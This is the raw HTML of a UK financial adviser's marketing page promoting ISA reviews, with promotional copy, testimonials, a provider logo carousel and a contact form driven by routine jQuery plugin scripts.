id=\"main\" class=\"width-100\" style=\"overflow:hidden !important;padding-left:0px;padding-right:0px;\">&#13;\n		<div class=\"avada-row\" style=\"max-width:100%;\">&#13;\n				<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-119\" class=\"post-119 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">ISAs</span>&#13;\n			<span class=\"updated\" style=\"display: none;\"/>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:0px;padding-bottom:20;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<h2 style=\"text-align: center;\"><span style=\"font-size: x-large;\"><span style=\"color: #afd9a5;\">ISAs</span> -We Help You Make The Most of Your 2017/14 <span style=\"color: #afd9a5;\">ISA Allowance </span></span></h2>&#13;\n<h3 style=\"text-align: center;\">Choose from a range of cash or Invest in Stocks and Shares in tax-efficient way by taking out an Individual Savings Account. We make tax-efficient saving easy to ensure you don’t lose out.&#13;\n</h3><p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2013/06/pension-transfer.jpg\"><img class=\"aligncenter  wp-image-5205\" alt=\"pension transfer\" src=\"/wp-content/uploads/2013/06/pension-transfer.jpg\" width=\"846\" height=\"274\"/></a></p>&#13;\n<div class=\"demo-sep sep-double\" style=\"margin-top:20px;margin-bottom:20px\"/><div class=\"one_half\"> <style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><h2>Have A Happy ISA Year?</h2><p/>&#13;\n<p><em>Don’t be one of the countless thousands who miss out on using their tax-efficient allowance before 5th April.</em></p>&#13;\n<p> </p>&#13;\n<p>Individual Saving Accounts otherwise known as ISAs provide you with the opportunity to make a generous tax free saving each year, as there are no deductions of capital gains tax or income tax on each return.</p>&#13;\n<p> </p>&#13;\n<p>ISAs themselves are not an investment but instead a wrapper that allows you to save money without the hassle of losing profit to capital gains tax and income tax. It is free to open an Individual Savings Account and whatever you save over the year will be tax-free.</p>&#13;\n<p> </p>&#13;\n<p>Even if you withdrew part of your funds, you will not pay tax on this amount. However, this is permanently discounted from your yearly allowance.</p>&#13;\n<p> </p>&#13;\n<p>Call us FREE on  or click the link to the right to discuss your ISA options</p></section></div></div><div class=\"one_half last\"><div class=\"accordian\"><h5 class=\"toggle active\"><a href=\"#\"><span class=\"arrow\"/>Here\'s how we will help you make the ISA choices</a></h5><div class=\"toggle-content default-open\" style=\"display: block;\">&#13;\n<ul><li>Jargon free independent advice, we have no affiliation with any business that could influence our assessment of your savings advice.</li>&#13;\n<li>Next generation ISA comparison software and experience to find you the best deals in the market.</li>&#13;\n<li>No upfront advice charging or any hidden fees and costs.</li>&#13;\n<li>Bespoke portfolio – matched to your investment requirements and individual needs.</li>&#13;\n<li>Annual reviews – to keep your investment on track, grow and meet your savings goals.</li>&#13;\n<li>We don’t rush you into a ISA. You’ll feel safe in the knowledge that your savings needs are all being expertly handled by real people who care</li>&#13;\n</ul><p/></div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>2o Years Established - That Counts</a></h5><div class=\"toggle-content \" style=\"\">This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our conversation.</div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Promise</a></h5><div class=\"toggle-content \" style=\"\">We stand for honesty – advice – trust and value. Our culture and people matter and promise you this, the team that makes Equity SMART work will be centred on you. Our team believe in treating clients like family, so you can be confident that we’ll give you the same advice we would give to our own relatives.</div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Investment Philosophy -Get Rich Slowly</a></h5><div class=\"toggle-content \" style=\"\">We believe in a “Get Rich Slowly” philosophy through a “passive investment” approach to purchasing investments. This we believe is the right choice for the majority of investors who are seeking more peace of mind, when looking to achieve sustained performance over the longer term.&#13;\n<ul><li>Passive investment is the rational, mathematically proven route to investing success.</li>&#13;\n<li>Our investment strategies are focused on your risk profile, well researched, efficient and low maintenance.</li>&#13;\n<li>We look to keep your costs low through longer term appreciation, reduced maintenance and look to avoid unnecessary trading.</li>&#13;\n<li>Ensure you are not over exposed at any time through wide diversification of your asset classes.</li>&#13;\n<li>We provide regular reviews and rebalancing when required or on a 6 monthly or yearly basis.</li>&#13;\n</ul><p/></div></div> <div class=\"demo-sep sep-none\" style=\"margin-top:18px;\"/><a class=\"button large e.g. green\" href=\"#standard\" target=\"\">Click Here For Your Free ISA Review</a></div><div class=\"clearboth\"/> </div></div> <div class=\"fullwidth-box\" style=\"background-color:#fafafa;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid #fafafa;border-bottom:0px solid #fafafa;padding-top:5px;padding-bottom:1px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <div class=\"title\"><h1>Get Your ISA Review in 4 Easy Steps</h1><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div><div class=\"demo-sep sep-none\" style=\"margin-top:45px;\"/><style type=\"text/css\"><![CDATA[\r\n		#content-boxes-1 article.col{background-color:#ffffff !important;}\r\n		#content-boxes-1 .fontawesome-icon.circle-yes{color:#ffffff !important;background-color:#afd9a5 !important;border:1px solid #afd9a5 !important;}\r\n		]]></style><section class=\"clearfix columns content-boxes content-boxes-icon-boxed columns-4\" id=\"content-boxes-1\"><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Contact us today</h2></div><div class=\"col-content-container \">Get in touch to find out how we can be of service. It’s confidential and we provide you with the highest level of consumer protection when it comes to ISA advice.</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Prepare A Review</h2></div><div class=\"col-content-container \">We’ll get to know you, your specific needs and your financial circumstances to allow us to analyse and report back, allowing you to make better and more informed decisions.</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Explain Options</h2></div><div class=\"col-content-container \">We’ll explain all the ISA options available to you, discuss both the pros &amp; the cons and then make a written recommendation on your best options.</div></article><article class=\"col last\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-ok\"/><h2>If You Proceed</h2></div><div class=\"col-content-container \">All the paperwork is arranged for you and processed quickly &amp; efficiently. Throughout this process we’ll always be in touch, keeping you in the loop and up to date.</div></article></section><style type=\"text/css\"><![CDATA[#reading-box-container-2 .tagline-shadow:before,#reading-box-container-2 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-2\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#ffffff !important;border-width:1px;border-color:#f6f6f6!important;border-top-width:3px !important;border-top-color:#afd9a5!important;border-style:solid;\"><a href=\"#standard\" target=\"\" class=\"continue button large default\">Start Your ISA Review</a><h2>Start Your ISA Review Today</h2><p>Click the button and fill out our short form and one of our advisers will contact you.</p><a href=\"#standard\" target=\"\" class=\"continue mobile-button button large default\">Start Your ISA Review</a></section></div><a id=\"iphorm_fancybox_52fe0cf9dd9ba\" class=\"iphorm-fancybox-link iphorm-fancybox-link-1\" href=\"#\"/>&#13;\n<script type=\"text/javascript\"><![CDATA[\r\n<!--\r\n    jQuery(document).ready(function ($) {\r\n        var $link = $(\'#iphorm_fancybox_52fe0cf9dd9ba\');\r\n        if ($.isFunction($.fn.fancybox) && !$link.data(\'iphorm-initialised\')) {\r\n            $link.fancybox($.extend({\r\n                inline: true,\r\n                href: \'#iphorm-outer-52fe0cf9d9b3b\',\r\n                onStart: function () {\r\n                    $(\'#fancybox-outer\').css(\'opacity\', 0);\r\n                },\r\n                onComplete: function () {\r\n                    $(\'#fancybox-wrap, #fancybox-content\').css({width: \'auto\'});\r\n                    $.fancybox.center(0);\r\n                    setTimeout(function () {\r\n                        $(\'#fancybox-outer\').animate({opacity: 1}, 400);\r\n                        $(\'#fancybox-overlay\').css({height: $(document).height()});\r\n                    }, 1);\r\n                }\r\n            }, {})).data(\'iphorm-initialised\', true);\r\n        }\r\n    });\r\n//-->\r\n]]></script><div style=\"display: none;\">&#13;\n<div id=\"iphorm-outer-52fe0cf9d9b3b\" class=\"iphorm-outer iphorm-outer-1 iphorm-uniform-theme-default iphorm-theme-light-rounded\">&#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n		    jQuery(document).ready(function($) {\r\n			\r\n        	$(\'#iphorm-52fe0cf9d9b3b\').iPhorm({\"id\":1,\"uniqueId\":\"52fe0cf9d9b3b\",\"PHPSESSID\":\"c38466902c5d1751df83bf30eae20c22\",\"useAjax\":true,\"successMessageTimeout\":10,\"clElementIds\":[],\"clDependentElementIds\":[],\"centerFancybox\":true,\"centerFancyboxSpeed\":true});\r\n\r\n	        	        if ($.isFunction($.fn.qtip)) {\r\n	            $(\'.iphorm-tooltip-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'focus\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'click\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-labels-inside > .iphorm-element-spacer > label\').hover(function () {\r\n	                $(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'show\');\r\n	            }, function () {\r\n	            	$(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'hide\');\r\n	            });\r\n	        }\r\n	        \r\n	        	        if ($.isFunction($.fn.uniform)) {\r\n	            $(\'select, input:checkbox, input:radio\', iPhorm.instance.$form).uniform({context: iPhorm.instance.$form, selectAutoWidth: false});\r\n	        }\r\n	        \r\n	        if ($.isFunction($.fn.inFieldLabels)) {\r\n	            $(\'.iphorm-labels-inside:not(.iphorm-element-wrap-recaptcha) > .iphorm-element-spacer > label\', iPhorm.instance.$form).inFieldLabels();\r\n	        }\r\n\r\n	        \r\n	        $(\'.iphorm-group-row > div:last-child:not(:first-child)\', iPhorm.instance.$form).add(\'.iphorm-group-row:last-child\', iPhorm.instance.$form).addClass(\'last-child\');\r\n\r\n	        	    }); // end document.ready()\r\n	//-->\r\n	]]></script><form id=\"iphorm-52fe0cf9d9b3b\" class=\"iphorm iphorm-form-1\" action=\"../..isas/\" method=\"post\" enctype=\"multipart/form-data\">&#13;\n        <div class=\"iphorm-inner iphorm-inner-1\">&#13;\n            <input type=\"hidden\" name=\"iphorm_id\" value=\"1\"/><input type=\"hidden\" name=\"iphorm_uid\" value=\"52fe0cf9d9b3b\"/><input type=\"hidden\" name=\"form_url\" value=\"http://www.equalitywalk.org.ukisas/\"/><input type=\"hidden\" name=\"referring_url\" value=\"\"/><input type=\"hidden\" name=\"post_id\" value=\"119\"/><input type=\"hidden\" name=\"post_title\" value=\"ISAs\"/><h3 class=\"iphorm-title\">Contact Equity SMART&#13;\n                                        </h3><p class=\"iphorm-description\"><big>For expert impartial advice and a FREE consultation with no obligation fill out the short form below.<br/><br/>&#13;\n&#13;\nor<br/><br/><b>Call Us FREE on <span class=\"rTapNumber13629\"/></b>&#13;\n</big></p>&#13;\n                                    	            		<div class=\"iphorm-success-message iphorm-hidden\"/>&#13;\n            	                        <div class=\"iphorm-elements iphorm-elements-1 iphorm-clearfix\">&#13;\n                <div class=\"iphorm-group-wrap iphorm_1_6-group-wrap iphorm-clearfix iphorm-labels-above iphorm-group-style-plain iphorm-group-alignment-proportional\">&#13;\n    <div class=\"iphorm-group-elements\">&#13;\n                <div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-1cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_1-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_1-element-spacer\">&#13;\n                    <label for=\"iphorm_1_1_52fe0cf9d9b3b\">&#13;\n                Name                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_1-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_1\" id=\"iphorm_1_1_52fe0cf9d9b3b\" type=\"text\" name=\"iphorm_1_1\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div>        </div> <!-- /.iphorm-group-row -->&#13;\n    </div> <!-- /.iphorm-group-elements -->&#13;\n</div> <!-- /.iphorm-group-wrap --><div class=\"iphorm-group-wrap iphorm_1_8-group-wrap iphorm-clearfix iphorm-labels-above iphorm-group-style-plain iphorm-group-alignment-proportional\">&#13;\n    <div class=\"iphorm-group-elements\">&#13;\n                <div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-2cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_5-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_5-element-spacer\">&#13;\n                    <label for=\"iphorm_1_5_52fe0cf9d9b3b\">&#13;\n                Contact Number                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_5-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_5\" id=\"iphorm_1_5_52fe0cf9d9b3b\" type=\"text\" name=\"iphorm_1_5\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_2-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_2-element-spacer\">&#13;\n                    <label for=\"iphorm_1_2_52fe0cf9d9b3b\">&#13;\n                Email address                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_2-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_2\" id=\"iphorm_1_2_52fe0cf9d9b3b\" type=\"text\" name=\"iphorm_1_2\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div></div><div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-2cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-checkbox iphorm_1_11-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-checkbox iphorm_1_11-element-spacer\">&#13;\n                    <label class=\"iphorm_1_11-outer-label\">&#13;\n                What Would You Like To Discuss?                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-checkbox iphorm_1_11-input-wrap\">&#13;\n            <div class=\"iphorm-input-ul iphorm-input-checkbox-ul iphorm_1_11-input-ul iphorm-options-block iphorm-clearfix\">&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_1_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_1\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fe0cf9d9b3b_1\" value=\"Pensions\"/>&#13;\n                        Pensions                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_2_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_2\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fe0cf9d9b3b_2\" value=\"Insurance\"/>&#13;\n                        Insurance                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_3_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_3\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fe0cf9d9b3b_3\" value=\"Trusts\"/>&#13;\n                        Trusts                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_4_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_4\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fe0cf9d9b3b_4\" value=\"Investments\"/>&#13;\n                        Investments                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_5_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_5\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fe0cf9d9b3b_5\" value=\"Wealth\"/>&#13;\n                        Wealth                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_6_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_6\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fe0cf9d9b3b_6\" value=\"Other\"/>&#13;\n                        Other                    </label>&#13;\n                </div>&#13;\n                        </div>&#13;\n                    </div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-element-wrap iphorm-element-wrap-textarea iphorm_1_10-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-textarea iphorm_1_10-element-spacer\">&#13;\n                    <label for=\"iphorm_1_10_52fe0cf9d9b3b\">&#13;\n                Comments                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-textarea iphorm_1_10-input-wrap\">&#13;\n            <textarea class=\"iphorm-element-textarea  iphorm_1_10\" id=\"iphorm_1_10_52fe0cf9d9b3b\" name=\"iphorm_1_10\" rows=\"5\" cols=\"25\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div>        </div> <!-- /.iphorm-group-row -->&#13;\n    </div> <!-- /.iphorm-group-elements -->&#13;\n</div> <!-- /.iphorm-group-wrap --><div class=\"iphorm-element-wrap iphorm-element-wrap-captcha iphorm_1_4-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-captcha iphorm_1_4-element-spacer\">&#13;\n                    <label for=\"iphorm_1_4_52fe0cf9d9b3b\">&#13;\n                Type the characters                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-captcha iphorm_1_4-input-wrap\">&#13;\n            <input class=\"iphorm-element-captcha  iphorm_1_4\" id=\"iphorm_1_4_52fe0cf9d9b3b\" type=\"text\" name=\"iphorm_1_4\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-captcha-image-wrap iphorm-clearfix iphorm_1_4-captcha-image-wrap\">&#13;\n            <div class=\"ifb-captcha-image-inner\">&#13;\n                &#13;\n            </div>&#13;\n        </div>&#13;\n&#13;\n        <script type=\"text/javascript\"><![CDATA[\r\n        <!--\r\n        jQuery(document).ready(function ($) {\r\n            $(\'#iphorm-captcha-image-iphorm_1_4_52fe0cf9d9b3b\').hover(function () {\r\n                $(this).stop().fadeTo(\'slow\', \'0.3\');\r\n            }, function () {\r\n                $(this).stop().fadeTo(\'slow\', \'1.0\');\r\n            }).click(function () {\r\n                var newSrc = $(this).attr(\'src\').replace(/&t=.+/, \'&t=\' + new Date().getTime());\r\n                $(this).attr(\'src\', newSrc);\r\n            });\r\n        });\r\n        //-->\r\n        ]]></script><div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-hidden\">&#13;\n    <label>This field should be left blank<input type=\"text\" name=\"iphorm_1_0\"/></label>&#13;\n</div>                <div class=\"iphorm-submit-wrap iphorm-submit-wrap-1 iphorm-clearfix\">&#13;\n                	<div class=\"iphorm-submit-input-wrap iphorm-submit-input-wrap-1\">&#13;\n                        <button class=\"iphorm-submit-element\" type=\"submit\" name=\"iphorm_submit\"><span><em>Send Enquiry</em></span></button>&#13;\n                    </div>&#13;\n                    <div class=\"iphorm-loading-wrap\"><span class=\"iphorm-loading\">Please wait...</span></div>&#13;\n                </div>&#13;\n            </div>&#13;\n                                            </div>&#13;\n            &#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n	jQuery(\'#iphorm-outer-52fe0cf9d9b3b script\').remove();\r\n	//-->\r\n	]]></script></form></div></div>&#13;\n        <script type=\"text/javascript\"><![CDATA[// <![CDATA[\r\njQuery(document).ready(function ($) {     $(\'a[href=\"#standard\"]\').click(function () {         $(\'.iphorm-fancybox-link\').click();         return false;     }); });\r\n// ]]&gt;]]></script></div></div> <div class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:15px;padding-bottom:0;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <div class=\"title\"><h2>Kind Words &amp; Praise</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <div class=\"one_half\"> <style type=\"text/css\"><![CDATA[\r\n		#testimonials-1 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-1 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style><div id=\"testimonials-1\" class=\"reviews clearfix\"/> <div class=\"review male\"><blockquote><q>“Very pleased with the service provided. Highly professional and standard of information provided was very comprehensive. I was kept informed at all stages of the process.”</q><div class=\"clearfix\"><span class=\"company-name\">Stephen McCoy</span></div></blockquote></div></div> <div class=\"one_half last\"><style type=\"text/css\"><![CDATA[\r\n		#testimonials-2 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-2 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style><div id=\"testimonials-2\" class=\"reviews clearfix\"> <div class=\"review male\"><blockquote><q>“I found the staff who I personally dealt with very friendly helpful and professional and the people on the other side of the phone exceptionally friendly too.”</q><div class=\"clearfix\"><span class=\"company-name\">M Patterson</span></div></blockquote></div> </div> </div><div class=\"clearboth\"/>&#13;\n<p>We Compare All The Leading ISA Providers. Here are a Few You Might Recognise:</p>&#13;\n<div class=\"images-carousel-container related-posts related-projects \"><div id=\"carousel\" class=\"clients-carousel es-carousel-wrapper\"><div class=\"es-carousel\"><ul><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/axa.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/aegon.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/aviva.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/friendslife.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/Standard_Life_logo1.png\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/legal-and-general.gif\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/prudential.jpg\" alt=\"\"/></a></li></ul><div class=\"es-nav\"><span class=\"es-nav-prev\">Previous</span><span class=\"es-nav-next\">Next</span></div></div></div></div></div></div> <div class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"><style type=\"text/css\"><![CDATA[#reading-box-container-3 .tagline-shadow:before,#reading-box-container-3 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-3\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#fafafa !important;border-width:0px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><a href=\"#standard\" target=\"\" class=\"continue button large default\">Book Now</a><h2>It’s all so simple. To book a chat with our investment experts, click the link.</h2><p>It\'s free, and we think you\'ll like what you hear.</p><a href=\"#standard\" target=\"\" class=\"continue mobile-button button large default\">Book Now</a></section></div> <div class=\"title\"><p>More Information</p><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div><div class=\"accordian\"><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>More Detail on individual Savings Accounts (ISAS) are Free of Income Tax</a></h5><div class=\"toggle-content \" style=\"\">If you are a higher rate taxpayer, an ISA is particularly valuable. If you received a £100 return on a dividend, you would have to pay £25.00 on income tax. However, if this money was invested in a tax efficient ISA, there would be no income tax to pay. This is worthwhile especially if your tax rate bracket is due to increase in the future, and there is no guarantee that the Government will not alter the current tax bands and force more people into a higher tax rate bracket in the future. </div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Pay No Capital Gains Tax</a></h5><div class=\"toggle-content \" style=\"\"> When you open an Individual Savings Account, there is no capital gains tax to pay on the yearly allowance. This is reassuring to anyone who decides to open an ISA. </div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Tax Efficient Bonds - Something Else To Consider</a></h5><div class=\"toggle-content \" style=\"\"> If you held bonds on your ISA, the generated income would be free of capital gains tax and income tax. This is especially useful if you decide to use your funds as an income source, perhaps as retirement looms. If you feel no current need to invest in bonds, you may want to rethink moving equity funds into bonds for the future, especially if you may need to withdraw an income or diminish the level of risk in your financial portfolio, as you grow closer to retirement. </div></div> </div></div>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a 